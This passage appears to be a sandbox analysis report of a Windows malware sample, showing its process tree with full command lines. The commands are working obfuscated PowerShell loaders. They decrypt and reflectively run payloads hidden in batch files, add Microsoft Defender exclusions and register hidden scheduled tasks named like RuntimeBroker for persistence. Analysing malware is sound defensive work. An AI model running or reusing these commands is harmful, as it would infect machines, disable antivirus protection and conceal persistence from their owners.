        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_459.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4364
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
        6⤵
        
        PID:3764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_641_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_641.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2332
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_641.vbs"
        8⤵
        Checks computer location settings
        
        PID:3652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_641.bat" "
        9⤵
        
        PID:2028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_641.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3972
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
        5⤵
        
        PID:1208
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_253_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_253.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1604
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_253.vbs"
        7⤵
        Checks computer location settings
        
        PID:4160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_253.bat" "
        8⤵
        
        PID:836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_253.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
        5⤵
        
        PID:1388
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_710_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_710.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2056
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_710.vbs"
        7⤵
        Checks computer location settings
        
        PID:2868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_710.bat" "
        8⤵
        
        PID:2016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_710.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
      4⤵
      PID:4836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:3376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_656_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_656.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4412
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_656.vbs"
        6⤵
        Checks computer location settings
        
        PID:4372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_656.bat" "
        7⤵
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_656.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
      4⤵
      PID:2188
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:2980
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_924_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_924.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
